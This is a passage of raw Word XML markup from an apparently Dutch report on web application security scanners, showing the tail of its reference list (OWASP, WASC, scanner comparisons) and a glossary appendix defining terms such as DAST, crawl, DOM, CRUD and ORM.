          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP (2017). OWASP Top Ten Project, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5BFC">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Geraadpleegd</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5BFC">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652D4323" w14:textId="03CEC3F8" w:rsidR="00886D84" w:rsidRDefault="00C674E1" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5BFC">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:hyperlink r:id="rId125" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D48DA37" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E40A2BD" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="004E2F5B" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t>Sectoolmarket (2016). Price and feature Comparison of Web Application Scanners. Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147571E1" w14:textId="00AFF57F" w:rsidR="00886D84" w:rsidRDefault="004E2F5B" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C674E1" w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId126" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>http://www.sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3EE831D8" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7969AB87" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="004E2F5B" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t>Voogd K. (2011). Het Web: Web 1.0, Web 2.0, Web 3.0. Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789E883F" w14:textId="65E64231" w:rsidR="00886D84" w:rsidRDefault="004E2F5B" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId127" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>http://pc-en-internet.infonu.nl/geschiedenis/84250-het-web-web-10-web-20-web-30.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6CCCF858" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D86499C" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="00797560" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t>OWASP (2017). Vulnerability Scanning Tools. Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE70FA8" w14:textId="33C2D085" w:rsidR="00886D84" w:rsidRDefault="00797560" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId128" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0E602FBF" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53C658E7" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="00797560" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t>Acunetix (2017) Is your website hackable? Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A509824" w14:textId="7B4D86E8" w:rsidR="00886D84" w:rsidRDefault="00797560" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:hyperlink r:id="rId129" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://www.acunetix.com/resources/wvsbrochure.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1B147BE5" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BE1BAEF" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="00797560" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t>Schäferhoff N. (2016). 13 Surprising Wordpress Statistics. Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E97D83" w14:textId="1DCD4C40" w:rsidR="00886D84" w:rsidRDefault="00797560" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId130" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://torquemag.io/2016/10/13-surprising-wordpress-statistics-updated-2016/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="67F2FC9A" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="683D6F2F" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="00797560" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t>Wright K. Ithemes (2017). 5 Common WordPress Security Issues</w:t>
      </w:r>
      <w:r w:rsidR="00315FD7" w:rsidRPr="00CC5BFC">
        <w:t>. Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0880DBAA" w14:textId="17DF567D" w:rsidR="00886D84" w:rsidRDefault="00315FD7" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00797560" w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId131" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://ithemes.com/2017/01/16/wordpress-security-issues/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6FD1997A" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E05A8EA" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="00315FD7" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t>Techempower (2017). Web Framework Benchmarks. Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5277D0C3" w14:textId="6A2DF8FD" w:rsidR="00886D84" w:rsidRDefault="00315FD7" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:hyperlink r:id="rId132" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://www.techempower.com/benchmarks/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="56F9CEFC" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00B5F5FA" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="00315FD7" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t>Sitepoint (2015). The Best PHP Framework for 2015: SitePoint Survey Results. Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5990B808" w14:textId="5FAA3928" w:rsidR="00886D84" w:rsidRDefault="00315FD7" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:hyperlink r:id="rId133" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://www.sitepoint.com/best-php-framework-2015-sitepoint-survey-results/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="48868884" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="205F9C5C" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="00315FD7" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t>WASC (2011). Threat Classification. Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF0FA07" w14:textId="0EFE38C9" w:rsidR="00886D84" w:rsidRPr="00CC5BFC" w:rsidRDefault="00315FD7" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:hyperlink r:id="rId134" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>http://projects.webappsec.org/w/page/13246978/Threat%20Classification</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15D423A6" w14:textId="77777777" w:rsidR="00CC5BFC" w:rsidRDefault="00CC5BFC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1769B4EE" w14:textId="0D82562A" w:rsidR="00886D84" w:rsidRPr="00DA22A1" w:rsidRDefault="00886D84">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA22A1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2EC317" w14:textId="66B55516" w:rsidR="0022176D" w:rsidRDefault="007460D6" w:rsidP="001876C7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253243392" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3018B670" wp14:editId="27BF92AD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-897890</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-897890</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="844" name="Rectangle 84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A179F" id="Rectangle 844" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.7pt;margin-top:-70.65pt;width:25pt;height:1031.7pt;z-index:-2500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z1cp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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="009B6571">
        <w:t>Bijlage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3410B13D" w14:textId="02B0A920" w:rsidR="00F57BDD" w:rsidRDefault="00EF688B" w:rsidP="001876C7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Glossary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3590C3" w14:textId="62E33278" w:rsidR="00971C22" w:rsidRDefault="00AB602D" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MVP</w:t>
      </w:r>
      <w:r w:rsidR="00B84806"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15310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00582A37">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DAST</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3A2C351D" w:rsidR="000A66B5" w:rsidRDefault="000A66B5" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00582A37">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Crawl</w:t>
      </w:r>
      <w:r w:rsidRPr="000A66B5">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F22C65">
        <w:t xml:space="preserve">Bij een Crawl proces worden </w:t>
      </w:r>
      <w:r w:rsidR="003C4605">
        <w:t>HTML pagina’s doorzocht naar specifieke HTML DOM elementen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DD9966" w14:textId="4CFE6D61" w:rsidR="00C54597" w:rsidRDefault="00C54597" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>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15310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>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15310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00582A37">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>: Unified Resource Locator, een adres van website op het internet</w:t>
      </w:r>
      <w:r w:rsidR="0020140F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CA9A16" w14:textId="318F6C41" w:rsidR="00911E70" w:rsidRDefault="00463978" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00582A37">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Redirect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0020140F">
        <w:t>Een gebruiker van een internet browser wordt verzonden van de huidige URL naar een andere URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7623A6AC" w14:textId="6638D28D" w:rsidR="00EF688B" w:rsidRPr="00422AA7" w:rsidRDefault="00422AA7" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00582A37">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Library</w:t>
      </w:r>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CF25C5E" w:rsidR="00573796" w:rsidRDefault="00573796" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00582A37">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Interface</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00DA5BED">
        <w:t>Gebruikersfunctionaliteiten</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> voor het uitvoeren van programmatische handelin</w:t>
      </w:r>
      <w:r w:rsidR="00D7605C">
        <w:t>gen in een software applicatie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75232846" w14:textId="68CE4043" w:rsidR="008B4655" w:rsidRPr="00E8143C" w:rsidRDefault="008B4655" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00582A37">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>HTML</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4B843A6F" w:rsidR="00A610CC" w:rsidRDefault="00A610CC" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00582A37">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DOM</w:t>
      </w:r>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15310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00582A37">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DBMS</w:t>
      </w:r>
      <w:r>
        <w:t>: databasemanagementsystemen, applicatie waarmee SQL databases gemaakt kunnen worden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC19031" w14:textId="034DC486" w:rsidR="009A7E14" w:rsidRPr="009A7E14" w:rsidRDefault="00422628" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00582A37">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Endpoint</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56FAC497" w14:textId="67B4D0B6" w:rsidR="008C097F" w:rsidRPr="008C097F" w:rsidRDefault="00AB602D" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CRUD</w:t>
      </w:r>
      <w:r w:rsidR="008C097F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="001C3ECA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001C3ECA" w:rsidRPr="001C3ECA">
        <w:t>CRUD staat voor Create, Read, Update, Delete</w:t>
      </w:r>
      <w:r w:rsidR="001C3ECA">
        <w:t>. Dit zijn de database evenementen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6022B596" w14:textId="77777777" w:rsidR="00550021" w:rsidRPr="00550021" w:rsidRDefault="008C097F" w:rsidP="00550021">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C097F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ORM</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="001C3ECA">
        <w:t xml:space="preserve"> ORM staat voor Object Relation Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462C05C7" w14:textId="4445E7AA" w:rsidR="00F241F6" w:rsidRPr="00550021" w:rsidRDefault="00550021" w:rsidP="00550021">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ERD</w:t>
      </w:r>
      <w:r w:rsidRPr="00550021">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>ERD staat voor Entity Relationship Diagram</w:t>
      </w:r>
      <w:r w:rsidR="00F241F6">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4167C84A" w14:textId="66617DBA" w:rsidR="00487AE4" w:rsidRDefault="007460D6" w:rsidP="00F241F6">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253245440" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="55E11327" wp14:editId="52D0515A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-902335</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-892810</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="845" name="Rectangle 8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A55C0" id="Rectangle 845" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.05pt;margin-top:-70.25pt;width:25pt;height:1031.7pt;z-index:-2500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l9J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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="457B9906" w14:textId="40A3AABC" w:rsidR="00487AE4" w:rsidRPr="002E2EF6" w:rsidRDefault="000876DB" w:rsidP="003527DB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="002E2EF6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252359680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="562FF535" wp14:editId="7210ED94">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-193040</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>742950</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6536055" cy="5855970"/>
            <wp:effectExtent l="25400" t="25400" r="17145" b="3683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135">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
